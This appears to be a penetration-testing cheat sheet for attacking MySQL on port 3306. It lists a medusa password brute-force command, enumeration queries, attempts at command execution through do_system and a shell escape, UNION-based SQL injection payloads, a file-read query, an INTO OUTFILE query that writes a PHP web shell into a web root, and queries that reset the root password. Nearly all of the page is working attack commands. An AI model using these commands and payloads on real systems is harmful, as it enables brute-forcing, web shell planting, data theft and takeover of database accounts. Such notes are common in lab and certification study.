Powered by

# Port 3306 - MySQL

# Bruteforce 

medusa -h 10.11.1.11 -u root -P /usr/share/wordlists/rockyou.txt -M mysql

# Connect 

mysql -h 10.11.1.11 -u root -p

# Syntax & Commands 

show databases;
use <database>;
show tables;
describe <table_name>;

select grantee, table_schema, privilege_type FROM schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

# Try to execute code
select do_system('id');
\! sh

# Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

# Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

© Copyright 2024. Caue All rights reserved.